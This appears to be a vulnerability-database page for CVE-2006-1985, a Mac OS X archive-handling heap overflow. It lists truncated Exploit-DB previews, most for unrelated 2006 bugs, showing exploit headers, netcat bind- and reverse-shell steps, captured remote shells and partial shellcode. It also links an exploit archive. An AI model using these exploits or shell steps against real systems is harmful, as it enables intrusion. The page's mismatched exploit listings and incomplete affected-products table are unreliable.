CVE-2006-1985
Published 2006-04-21
CVE-2006-1985: Heap-based buffer overflow in BOM BOMArchiveHelper 10.4 (6.3) Build 312, as used in Mac OS X 10.4.6 and earlier, allows user-assisted attackers to execute…
Priority P4 · 30 · medium · 5.1 CVSS 2.0
AV:N/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 13.91% (96.1th percentile)
Heap-based buffer overflow in BOM BOMArchiveHelper 10.4 (6.3) Build 312, as used in Mac OS X 10.4.6 and earlier, allows user-assisted attackers to execute arbitrary code via a crafted archive (such as ZIP) that contains long path names, which triggers an error in the BOMStackPop function.
Affected
38 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
No detection rules found.
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
exploitdb·2006-09-20
CVE-2006-4974 Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
---
/*
ws_exp.c
WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>ws_exp 1 192.168.0.1 4444
[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
[*] Coded by h07
[+] Listening on 21
[+] Connection accepted from 192.168.0.3
[+] Client request: USER h07
[+] Client request: PWD
[+] Client request: SYST
[+] Client request: HELP
[+] Client request: PASV
[+] Sending buffer: OK
[*] Press enter to quit
C:\>nc -v -l -p 4444
listening on [any] 4444 ...
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
Microsoft Windows 2000 [Wersja 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\WS_FTP>
*/
#include
#define
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
exploitdb·2006-08-19
CVE-2006-3439 Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
---
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MS06-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successful exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.te
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb·2006-07-27
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow
exploitdb·2006-04-20
CVE-2006-1985 Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow
---
source: https://www.securityfocus.com/bid/17634/info
Apple Mac OS X is reported prone to multiple security vulnerabilities.
These issues affect Mac OS X and various applications including Safari, Preview, Finder, QuickTime, and BOMArchiveHelper. A remote attacker may exploit these issues to execute arbitrary code and/or trigger a denial-of-service condition.
Apple Mac OS X 10.4.6 and prior are reported vulnerable to these issues.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27715.zip
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2006/May/msg00003.html
http://secunia.com/advisories/19686
http://secunia.com/advisories/20077
http://securitytracker.com/id?1016082
http://www.osvdb.org/24819
http://www.security-protocols.com/modules.php?name=News&file=article&sid=3233
http://www.security-protocols.com/sp-x25-advisory.php
http://www.securityfocus.com/bid/17634
http://www.securityfocus.com/bid/17951
http://www.us-cert.gov/cas/techalerts/TA06-132A.html
http://www.vupen.com/english/advisories/2006/1452
http://www.vupen.com/english/advisories/2006/1779
https://exchange.xforce.ibmcloud.com/vulnerabilities/25945
Published: 2006-04-21